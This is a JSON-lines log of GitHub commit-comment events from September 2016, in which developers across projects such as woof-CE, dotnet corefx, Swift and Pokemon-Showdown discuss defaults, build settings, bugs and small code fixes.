{"id":"4542281413","type":"CommitCommentEvent","actor":{"login":"rob-hipps"},"repo":{"name":"rob-hipps/googlemapstuff"},"payload":{"comment":{"id":18969276,"position":null,"line":null,"path":null,"commit_id":"d7be8a26cc5bcaf7f0900565f3e3ebdbe547de22","created_at":"2016-09-09T20:39:36Z","updated_at":"2016-09-09T20:39:36Z","body":"98% to go!\n\n> On Sep 9, 2016, at 4:38 PM, ProfessorSJ <notifications@github.com> wrote:\n> \n> Excellent, Rob! You made it through the first session.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/rob-hipps/googlemapstuff/commit/d7be8a26cc5bcaf7f0900565f3e3ebdbe547de22#commitcomment-18969263>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AK7qzbVCK7Ldk5AxsJXIK_icgVIgzizaks5qocPYgaJpZM4J5cFJ>.\n> \n\n"}},"created_at":"2016-09-09T20:39:36Z"}
{"id":"4542281463","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18969277,"position":124,"line":176,"path":"woof-code/rootfs-skeleton/usr/bin/dir2pet","commit_id":"cd80fb134b90b0b3833f160cb34cf2b211a94d24","created_at":"2016-09-09T20:39:36Z","updated_at":"2016-09-09T20:39:36Z","body":"Hi Richard.\n\nBy that rationale, why not just edit the help?\n\nAnyway, beside that, I reckon most users would perhaps prefer to have\ntheir compression option set permanently via a config file (overridden by\neither\nthe -x / -g option or at the interactive stage) .\n\nMy idea would be to keep your current logic in tact but add a test for the\nconfig\n(lets say the config is $HOME/.dir2pet.cfg containing either comp=gz or\ncomp=xz)\nand just adjust the interactive routine slightly to accommodate. This file\ncould be\ncreated on first run of dir2pet with a short question.\n\nI'll do some experimentation.\n\nOn Thu, Sep 8, 2016 at 9:57 PM, Richard Erwin <notifications@github.com>\nwrote:\n\n> Mick Amadio wrote:\n> >\n> > @rserwin1 <https://github.com/rserwin1> I think you missed the point\n> > of my intentions with the $comp variable. It was only designed as\n> > default for the 'skip' option. 'xz' was to be the default for the\n> > interactive mode with gzip default if the chip was an arm device. this\n> > was quite intentional and @zigbert <https://github.com/zigbert> has so\n> > far complained.\n> >\n> > Is there a reason you wanted the default to be gzip?\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/puppylinux-woof-CE/woof-CE/commit/\n> cd80fb134b90b0b3833f160cb34cf2b211a94d24#commitcomment-18935723>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ASod5oe0tZv1Aw_\n> HJrIgwAgJiGqubfzMks5qnyd-gaJpZM4J3W4K>.\n> >\n> Mick,\n> My intent was to make the default consistent with what you see when you\n> enter dir2pet --help. If you make it more complicated than that, please\n> so state in the --help response. Feel free to change it as you see fit,\n> but please be consistent. Thanks for reviewing my effort there.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/puppylinux-woof-CE/woof-CE/commit/cd80fb134b90b0b3833f160cb34cf2b211a94d24#commitcomment-18943648>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA-M7-o8vz3fnw1OM4HuPPDdanXxq83Dks5qn_gzgaJpZM4J3W4K>\n> .\n>\n"}},"created_at":"2016-09-09T20:39:36Z"}
{"id":"4542282031","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969280,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T20:39:44Z","updated_at":"2016-09-09T20:39:44Z","body":"@okitec\r\nGreat that wasn't much to much work... :unamused: "}},"created_at":"2016-09-09T20:39:44Z"}
{"id":"4542283613","type":"CommitCommentEvent","actor":{"login":"Maryom"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18969284,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:40:03Z","updated_at":"2016-09-09T20:40:03Z","body":"You are welcome."}},"created_at":"2016-09-09T20:40:03Z"}
{"id":"4542283623","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969285,"position":5,"line":6,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.builds","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:40:03Z","updated_at":"2016-09-09T20:40:03Z","body":"Yes I wasn't sure if that was temporary or not, so I hard-coded that value. What would we do for the next version such as 1.8 \\ 2.0? I was thinking the latest should always be the default, that way we can see include a test file if 1.7 or default (which would be more future-proof)"}},"created_at":"2016-09-09T20:40:03Z"}
{"id":"4542286181","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969291,"position":61,"line":46,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:40:33Z","updated_at":"2016-09-09T20:40:33Z","body":"mmm you are not compiling this library for uap10.1 so there is no reason why you would get a compile message. Do you mind sharing the logs of the build with the compile message so I can take a look?"}},"created_at":"2016-09-09T20:40:33Z"}
{"id":"4542286643","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18969293,"position":null,"line":null,"path":null,"commit_id":"7a8062b9219c6353c18e31188cdbd38249578ab0","created_at":"2016-09-09T20:40:38Z","updated_at":"2016-09-09T20:40:38Z","body":"Oh my."}},"created_at":"2016-09-09T20:40:38Z"}
{"id":"4542293574","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969312,"position":5,"line":6,"path":"src/System.Security.Cryptography.Csp/tests/System.Security.Cryptography.Csp.Tests.builds","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:42:04Z","updated_at":"2016-09-09T20:42:04Z","body":"Right, that is the plan in the future, but the thing is that not all test projects yet support 1.7 which is why only for tests we are keeping 1.6 as the default. Once all test projects run in 1.7, we will use that as the default."}},"created_at":"2016-09-09T20:42:04Z"}
{"id":"4542300701","type":"CommitCommentEvent","actor":{"login":"stylesuxx"},"repo":{"name":"jrajav/esprima-walk"},"payload":{"comment":{"id":18969335,"position":null,"line":null,"path":null,"commit_id":"404e211bf36d2da9360ab0f80beb7f4afec4ed3b","created_at":"2016-09-09T20:43:31Z","updated_at":"2016-09-09T20:43:31Z","body":"Hey, could you please make a npm release with this patch please?"}},"created_at":"2016-09-09T20:43:31Z"}
{"id":"4542301032","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":18969336,"position":null,"line":null,"path":null,"commit_id":"1ce8b87b96475e7f09d37a7bf6f8c0d5f6cdac31","created_at":"2016-09-09T20:43:35Z","updated_at":"2016-09-09T20:43:35Z","body":"👍 "}},"created_at":"2016-09-09T20:43:35Z"}
{"id":"4542304093","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969346,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:44:13Z","updated_at":"2016-09-09T20:44:13Z","body":"Derp, this is my bad, I had some local changes to master. :o"}},"created_at":"2016-09-09T20:44:13Z"}
{"id":"4542305214","type":"CommitCommentEvent","actor":{"login":"jckarter"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18969349,"position":37,"line":68,"path":"stdlib/public/stubs/GlobalObjects.cpp","commit_id":"daa7bfc281fcb35ae990eabb98548f545f1240d2","created_at":"2016-09-09T20:44:26Z","updated_at":"2016-09-09T20:44:26Z","body":"Makes sense. It might be a good idea to use `open` and `read` so we don't otherwise have to warm up `stdio` right at process start."}},"created_at":"2016-09-09T20:44:26Z"}
{"id":"4542306107","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18969356,"position":null,"line":null,"path":null,"commit_id":"baf3d5de7f6ed70c4d0d2998ead6f6a6089c4994","created_at":"2016-09-09T20:44:39Z","updated_at":"2016-09-09T20:44:39Z","body":"Related to: backdrop/backdrop-issues#1699 "}},"created_at":"2016-09-09T20:44:39Z"}
{"id":"4542306122","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18969357,"position":null,"line":null,"path":null,"commit_id":"d9514ba5ac07b103c7124b0f19ba792beb418b0f","created_at":"2016-09-09T20:44:39Z","updated_at":"2016-09-09T20:44:39Z","body":"Related to: backdrop/backdrop-issues#1514 backdrop/backdrop-issues#1699 "}},"created_at":"2016-09-09T20:44:39Z"}
{"id":"4542312250","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18969376,"position":null,"line":null,"path":null,"commit_id":"71f0593c342d5eb08816d2df60d8c01ac2e4e25c","created_at":"2016-09-09T20:45:50Z","updated_at":"2016-09-09T20:45:50Z","body":"which is probably a good thing?"}},"created_at":"2016-09-09T20:45:50Z"}
{"id":"4542315891","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18969383,"position":null,"line":null,"path":null,"commit_id":"16275ae4b20e6d6994c17d2290bca30b8b55880a","created_at":"2016-09-09T20:46:32Z","updated_at":"2016-09-09T20:46:32Z","body":"You did well replacing the QUITMSG14 thing because there is an existing line for Doom 2 messages inside gzdoom.pk3... Even this one was good, but I like so much yours anyway :smile: \r\n![image](https://cloud.githubusercontent.com/assets/11136108/18402339/3c3e059c-76df-11e6-929e-adcdebd7a2a4.png)\r\n"}},"created_at":"2016-09-09T20:46:32Z"}
{"id":"4542317778","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18969384,"position":null,"line":null,"path":null,"commit_id":"440b78d66cb669c7e5e6adf53122ae047733f579","created_at":"2016-09-09T20:46:54Z","updated_at":"2016-09-09T20:46:54Z","body":"Related to: backdrop/backdrop-issues#1699 "}},"created_at":"2016-09-09T20:46:54Z"}
{"id":"4542322574","type":"CommitCommentEvent","actor":{"login":"xingzemao"},"repo":{"name":"xingzemao/test"},"payload":{"comment":{"id":18969392,"position":null,"line":null,"path":null,"commit_id":"74c3fd01323f3d53776c7fc21f01c4182428259f","created_at":"2016-09-09T20:47:47Z","updated_at":"2016-09-09T20:47:47Z","body":"this maybe the position to edit the file"}},"created_at":"2016-09-09T20:47:47Z"}
{"id":"4542324640","type":"CommitCommentEvent","actor":{"login":"xingzemao"},"repo":{"name":"xingzemao/test"},"payload":{"comment":{"id":18969401,"position":null,"line":null,"path":null,"commit_id":"74c3fd01323f3d53776c7fc21f01c4182428259f","created_at":"2016-09-09T20:48:11Z","updated_at":"2016-09-09T20:48:11Z","body":"OK, it turns to be a way to comment on the commit\r\n"}},"created_at":"2016-09-09T20:48:11Z"}
{"id":"4542328728","type":"CommitCommentEvent","actor":{"login":"nickscottcode"},"repo":{"name":"nickscottcode/TestRepo"},"payload":{"comment":{"id":18969407,"position":null,"line":null,"path":null,"commit_id":"c549484db45c04a03aad4a655219c727fee609ca","created_at":"2016-09-09T20:48:57Z","updated_at":"2016-09-09T20:48:57Z","body":"yellow"}},"created_at":"2016-09-09T20:48:57Z"}
{"id":"4542333794","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18969424,"position":null,"line":null,"path":null,"commit_id":"45cebdb1f00871a1db0c989266b30c0f747d4103","created_at":"2016-09-09T20:49:59Z","updated_at":"2016-09-09T20:49:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#CYMw1pf4SxWGcGcNoRPTBw"}},"created_at":"2016-09-09T20:49:59Z"}
{"id":"4542337259","type":"CommitCommentEvent","actor":{"login":"PietroFerl"},"repo":{"name":"PietroFerl/TestGit"},"payload":{"comment":{"id":18969436,"position":null,"line":null,"path":null,"commit_id":"be666c490eea28f71f14c0a9b29bdb765dc3a61e","created_at":"2016-09-09T20:50:41Z","updated_at":"2016-09-09T20:50:41Z","body":"test"}},"created_at":"2016-09-09T20:50:41Z"}
{"id":"4542338255","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18969440,"position":null,"line":null,"path":null,"commit_id":"337d4cb10dcdc7e87a2d8ae06a7ac149c61ef2b7","created_at":"2016-09-09T20:50:53Z","updated_at":"2016-09-09T20:50:53Z","body":"Yeah, we had a decently long discussion in Staff about it.\r\n\r\nThe correct solution is for PU to stop inheriting RU's ruleset, if PU doesn't want to inherit RU's rules. Introducing a hack, especially a hack that confuses users, is not a very good solution."}},"created_at":"2016-09-09T20:50:53Z"}
{"id":"4542340052","type":"CommitCommentEvent","actor":{"login":"chuggafan"},"repo":{"name":"absurdlyobfuscated/RedditSharp"},"payload":{"comment":{"id":18969446,"position":null,"line":null,"path":null,"commit_id":"88d83cf6524e13fc727d2a23556bfa0616f6b351","created_at":"2016-09-09T20:51:14Z","updated_at":"2016-09-09T20:51:14Z","body":"No problem, I always like to help"}},"created_at":"2016-09-09T20:51:14Z"}
{"id":"4542346191","type":"CommitCommentEvent","actor":{"login":"Tutyko2016"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18969457,"position":null,"line":null,"path":null,"commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T20:52:29Z","updated_at":"2016-09-09T20:52:29Z","body":"Can't check confirmations: HTTP error 429\r\n"}},"created_at":"2016-09-09T20:52:29Z"}
{"id":"4542350362","type":"CommitCommentEvent","actor":{"login":"mstanleyjones"},"repo":{"name":"mstanleyjones/docker"},"payload":{"comment":{"id":18969464,"position":null,"line":null,"path":null,"commit_id":"01fe5639bc46ea6cc2efe7b9333bb4d1abb1894b","created_at":"2016-09-09T20:53:16Z","updated_at":"2016-09-09T20:53:16Z","body":"@dnephin does this apply to 1.12.x?"}},"created_at":"2016-09-09T20:53:16Z"}
{"id":"4542358225","type":"CommitCommentEvent","actor":{"login":"phsc"},"repo":{"name":"phsc/web-installer"},"payload":{"comment":{"id":18969479,"position":null,"line":null,"path":null,"commit_id":"6ee0229ff085903b0834de7ce3ca9ea82d6526c3","created_at":"2016-09-09T20:54:51Z","updated_at":"2016-09-09T20:54:51Z","body":"Advantages:\r\n- File size: 145 KB > 21 KB\r\n- Always use the latest background image (no redundancy, no manual task when updating the background image in master)\r\n\r\nDisadvantage:\r\n- 1 additional HTTP request necessary"}},"created_at":"2016-09-09T20:54:51Z"}
{"id":"4542366398","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18969499,"position":88,"line":1389,"path":"js/client-chat.js","commit_id":"ada7385bb406b1e89e25037b5ab55f5bf625eeba","created_at":"2016-09-09T20:56:30Z","updated_at":"2016-09-09T20:56:30Z","body":"Why? The other messages should also be logged..."}},"created_at":"2016-09-09T20:56:30Z"}
{"id":"4542368895","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18969505,"position":88,"line":1389,"path":"js/client-chat.js","commit_id":"ada7385bb406b1e89e25037b5ab55f5bf625eeba","created_at":"2016-09-09T20:57:01Z","updated_at":"2016-09-09T20:57:01Z","body":"Also, as written, if someone sends `//help will display the help`, it wouldn't get logged, right?"}},"created_at":"2016-09-09T20:57:01Z"}
{"id":"4542369412","type":"CommitCommentEvent","actor":{"login":"bddckr"},"repo":{"name":"bddckr/SteamVR_Unity_Toolkit"},"payload":{"comment":{"id":18969506,"position":5,"line":5,"path":"Assets/VRTK/Scripts/VRTK_AdaptiveQuality.cs","commit_id":"97440f2debf3fd21e28fd218255ba2b19bebbc93","created_at":"2016-09-09T20:57:07Z","updated_at":"2016-09-09T20:57:07Z","body":"Actually it's `THIRD_PARTY_NOTICES` without the `.md`."}},"created_at":"2016-09-09T20:57:07Z"}
{"id":"4542373459","type":"CommitCommentEvent","actor":{"login":"auser"},"repo":{"name":"fullstackreact/react-daily-ui"},"payload":{"comment":{"id":18969514,"position":null,"line":null,"path":null,"commit_id":"b3bbfd339a42addca9a84845340d7e3e77448bdc","created_at":"2016-09-09T20:57:56Z","updated_at":"2016-09-09T20:57:56Z","body":"The link to the series is just a hash. "}},"created_at":"2016-09-09T20:57:56Z"}
{"id":"4542379261","type":"CommitCommentEvent","actor":{"login":"hlogeon"},"repo":{"name":"beaulirl/recepts"},"payload":{"comment":{"id":18969527,"position":null,"line":null,"path":null,"commit_id":"8a9e15205a8748fc214b8612203a204cddf5a2ac","created_at":"2016-09-09T20:59:07Z","updated_at":"2016-09-09T20:59:07Z","body":"Lena, whats your progress? When you'll make MVC version of this app?"}},"created_at":"2016-09-09T20:59:07Z"}
{"id":"4542379923","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18969530,"position":null,"line":null,"path":null,"commit_id":"8f18f78a9e13de62252cad20ddabd0f5714bae55","created_at":"2016-09-09T20:59:14Z","updated_at":"2016-09-09T20:59:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#CHdvVhwTRC-wACVVBk2XTw"}},"created_at":"2016-09-09T20:59:14Z"}
{"id":"4542382072","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18969539,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-09T20:59:40Z","updated_at":"2016-09-09T20:59:40Z","body":"I've actually created the 'scenarios' branch in the repo, just exactly as described in my earlier post, so if/when some core dumps are available, we'll have some place to put them!"}},"created_at":"2016-09-09T20:59:40Z"}
{"id":"4542382968","type":"CommitCommentEvent","actor":{"login":"rich-reactor8"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18969541,"position":9,"line":82,"path":"application/model/common_module/update/base_service.rb","commit_id":"665f79b60c953bc543a8e96104d1f9a3b344bd0e","created_at":"2016-09-09T20:59:51Z","updated_at":"2016-09-09T20:59:51Z","body":"Will keep my change in for time being. Do you know any test to check that\nmay break things?\n\nOn Fri, Sep 9, 2016 at 11:55 AM, Aldin Milanovic <notifications@github.com>\nwrote:\n\n> Not sure if this line will create new branch on git level along with\n> creating branch in object model (don't remember clearly but I think this is\n> the reason I used RepoManager.add_branch_and_push?(module_branch[:branch],\n> {}, base_branch) as well). Will need to double check.\n> Note: when new version of module is installed we need, on git level and in\n> object model, to create new branch for common module and for service module\n> as well.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dtk/dtk-server/commit/665f79b60c953bc543a8e96104d1f9a3b344bd0e#commitcomment-18967785>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABYOcPlzzcgNyg7mZDZabf154j155BeOks5qoaufgaJpZM4J5WfW>\n> .\n>\n"}},"created_at":"2016-09-09T20:59:51Z"}
{"id":"4542387116","type":"CommitCommentEvent","actor":{"login":"trenneman"},"repo":{"name":"trenneman/persistence-plugin-firebase"},"payload":{"comment":{"id":18969546,"position":21,"line":6,"path":"src/index.js","commit_id":"4832135fde9b69e4ef15956742e6fbaed87ec900","created_at":"2016-09-09T21:00:39Z","updated_at":"2016-09-09T21:00:39Z","body":"```\r\nexport firebase from '...';\r\n\r\nlet firebase = new Firebase({...});\r\nconfig.plugin(firebase)\r\n      .configure();\r\n\r\nfirebase.signIn(..., ...);\r\n```"}},"created_at":"2016-09-09T21:00:39Z"}
{"id":"4542387398","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18969548,"position":null,"line":null,"path":null,"commit_id":"71f0593c342d5eb08816d2df60d8c01ac2e4e25c","created_at":"2016-09-09T21:00:43Z","updated_at":"2016-09-09T21:00:43Z","body":"Nope, this was an error. Missed the line `x0.update(self.substitutions)` above `x0.update`"}},"created_at":"2016-09-09T21:00:43Z"}
{"id":"4542390415","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18969560,"position":null,"line":null,"path":null,"commit_id":"c8500173821f8ec6d96dac98a2d4780db485b811","created_at":"2016-09-09T21:01:19Z","updated_at":"2016-09-09T21:01:19Z","body":"++"}},"created_at":"2016-09-09T21:01:19Z"}
{"id":"4542390580","type":"CommitCommentEvent","actor":{"login":"tbsf"},"repo":{"name":"tbsf/pymessenger"},"payload":{"comment":{"id":18969562,"position":5,"line":6,"path":"pymessenger/graph_api.py","commit_id":"fe484e9ee46e1ab85a0696c9022ab716f90bc5cb","created_at":"2016-09-09T21:01:21Z","updated_at":"2016-09-09T21:01:21Z","body":"You should use None instead of {} as the default argument parameter.\r\n\r\nThen write\r\n\r\nif request_kwargs is none:\r\n&nbsp;&nbsp;&nbsp;&nbsp;request_kwargs = {}"}},"created_at":"2016-09-09T21:01:21Z"}
{"id":"4542394405","type":"CommitCommentEvent","actor":{"login":"tbsf"},"repo":{"name":"tbsf/pymessenger"},"payload":{"comment":{"id":18969577,"position":12,"line":135,"path":"pymessenger/bot.py","commit_id":"fe484e9ee46e1ab85a0696c9022ab716f90bc5cb","created_at":"2016-09-09T21:02:08Z","updated_at":"2016-09-09T21:02:08Z","body":"missing comma"}},"created_at":"2016-09-09T21:02:08Z"}
{"id":"4542396726","type":"CommitCommentEvent","actor":{"login":"tbsf"},"repo":{"name":"tbsf/pymessenger"},"payload":{"comment":{"id":18969584,"position":null,"line":null,"path":null,"commit_id":"fe484e9ee46e1ab85a0696c9022ab716f90bc5cb","created_at":"2016-09-09T21:02:34Z","updated_at":"2016-09-09T21:02:34Z","body":"should be good after those changes\r\n"}},"created_at":"2016-09-09T21:02:34Z"}
{"id":"4542398110","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969589,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T21:02:51Z","updated_at":"2016-09-09T21:02:51Z","body":"Looked like fun! What was the culprit in the end?\r\n\r\nYour `.gitignore` has been changed with your consent, I presume?"}},"created_at":"2016-09-09T21:02:51Z"}
{"id":"4542404589","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18969602,"position":null,"line":null,"path":null,"commit_id":"59415a84e641bfb8cd419b183c879e37c6cd0a56","created_at":"2016-09-09T21:04:01Z","updated_at":"2016-09-09T21:04:01Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#UtIzzqypTVGUkz5OlSGP6g"}},"created_at":"2016-09-09T21:04:01Z"}
{"id":"4542407051","type":"CommitCommentEvent","actor":{"login":"gdi2290"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18969611,"position":31,"line":31,"path":"src/app/app.service.ts","commit_id":"5dffc76b638adad74a2df59f9dfb75d92a44b76d","created_at":"2016-09-09T21:04:31Z","updated_at":"2016-09-09T21:04:31Z","body":"I'm forcing everyone to use new values to prevent anyone from relying on mutations which often leads to coupled code. I rather have developers, who are new to Angular2, programming in a more manageable way with less mutations"}},"created_at":"2016-09-09T21:04:31Z"}
{"id":"4542407750","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":18969613,"position":14,"line":172,"path":"ltac/profile_ltac.ml","commit_id":"1f358573df98358237b9af2a3ff48c99d8be0686","created_at":"2016-09-09T21:04:38Z","updated_at":"2016-09-09T21:04:38Z","body":"A \"vbox\" will interpret breaks _inside it_ as vertical breaks (\"@\\n\" in `Format` style).\r\n\r\n`v 0 (str \"a\") ++ v 0 (str \"b\")` has no say about how the boxes are placed, it is the container of both of them which commands. Note that a critical invariant of `Format` is that a top-level box _must_ be inserted."}},"created_at":"2016-09-09T21:04:38Z"}
{"id":"4542408939","type":"CommitCommentEvent","actor":{"login":"kyleshay"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18969619,"position":5,"line":571,"path":"app/scripts/minmax/dimMinMax.controller.js","commit_id":"25c51bdad475f0baf0297ca2e7e43f23b61a0a9f","created_at":"2016-09-09T21:04:53Z","updated_at":"2016-09-09T21:04:53Z","body":"right. not sure how that happened"}},"created_at":"2016-09-09T21:04:53Z"}
{"id":"4542410407","type":"CommitCommentEvent","actor":{"login":"DiamondBoyALS"},"repo":{"name":"OptiDevs/OptiChat"},"payload":{"comment":{"id":18969620,"position":null,"line":null,"path":null,"commit_id":"c64933b5b8002fcdc8caffbce23a2a99ca225d2c","created_at":"2016-09-09T21:05:12Z","updated_at":"2016-09-09T21:05:12Z","body":"## **Commit Tested** \r\nWith _Java 1.8.0_ on _Minecraft Spigot 1.10.2_ and _Minecraft PaperSpigot 1.10.2_."}},"created_at":"2016-09-09T21:05:12Z"}
{"id":"4542411444","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18969624,"position":null,"line":null,"path":null,"commit_id":"571e9cccd4654126a970ddfc8ca3d33b58b4e947","created_at":"2016-09-09T21:05:25Z","updated_at":"2016-09-09T21:05:25Z","body":"`landing_gear.py` standalone was also broken by this..."}},"created_at":"2016-09-09T21:05:25Z"}
{"id":"4542411683","type":"CommitCommentEvent","actor":{"login":"amiroperator"},"repo":{"name":"nova-framework/app"},"payload":{"comment":{"id":18969626,"position":null,"line":null,"path":null,"commit_id":"b5f3c233098afb0506d4226791e52369ec8a2e82","created_at":"2016-09-09T21:05:28Z","updated_at":"2016-09-09T21:05:28Z","body":"Please revert this commit !!"}},"created_at":"2016-09-09T21:05:28Z"}
{"id":"4542423695","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":18969664,"position":null,"line":null,"path":null,"commit_id":"6185f8849091e127ef6c3b280c6e4904644786c8","created_at":"2016-09-09T21:08:00Z","updated_at":"2016-09-09T21:08:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cjgSrTP2SSSY_ThaN0R9ug"}},"created_at":"2016-09-09T21:08:00Z"}
{"id":"4542430513","type":"CommitCommentEvent","actor":{"login":"aummicraft"},"repo":{"name":"abperiasamy/rtl8812AU_8821AU_linux"},"payload":{"comment":{"id":18969681,"position":null,"line":null,"path":null,"commit_id":"09a1e212b643c2ad01824fda27ce613489ba2de4","created_at":"2016-09-09T21:09:29Z","updated_at":"2016-09-09T21:09:29Z","body":"ioctl_cfg80211.c line 1704 compilation error : struct cfg80211_scan_info doesn't exist.\r\nDo you mean struct cfg80211_scan_request ?"}},"created_at":"2016-09-09T21:09:29Z"}
{"id":"4542445767","type":"CommitCommentEvent","actor":{"login":"keyurtechy"},"repo":{"name":"keyurtechy/mattercenter"},"payload":{"comment":{"id":18969726,"position":null,"line":null,"path":null,"commit_id":"9120758df457faeca5ef0269640c0a64ab0cf297","created_at":"2016-09-09T21:12:49Z","updated_at":"2016-09-09T21:12:49Z","body":"Code changes for functionality to work properly on documentDashboard page."}},"created_at":"2016-09-09T21:12:49Z"}
{"id":"4542446230","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":18969728,"position":null,"line":null,"path":null,"commit_id":"cb4b2e6d9b7ab7d428259d561d1ce4c7e78b4316","created_at":"2016-09-09T21:12:55Z","updated_at":"2016-09-09T21:12:55Z","body":"without changing the functionality, re-order the code in preparation for next steps"}},"created_at":"2016-09-09T21:12:55Z"}
{"id":"4542447719","type":"CommitCommentEvent","actor":{"login":"leletec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18969735,"position":null,"line":null,"path":null,"commit_id":"6e0197b4ad920610f63873ae3ff615e1becaec84","created_at":"2016-09-09T21:13:15Z","updated_at":"2016-09-09T21:13:15Z","body":"Those classes I want to use seem to need Gradle to work... which btw makes my app install so damn slow.\r\n\r\nNo, but I fixed it.\r\n"}},"created_at":"2016-09-09T21:13:15Z"}
{"id":"4542449821","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18969739,"position":null,"line":null,"path":null,"commit_id":"71f0593c342d5eb08816d2df60d8c01ac2e4e25c","created_at":"2016-09-09T21:13:41Z","updated_at":"2016-09-09T21:13:41Z","body":"Pushed to master, since this was a major bug."}},"created_at":"2016-09-09T21:13:41Z"}
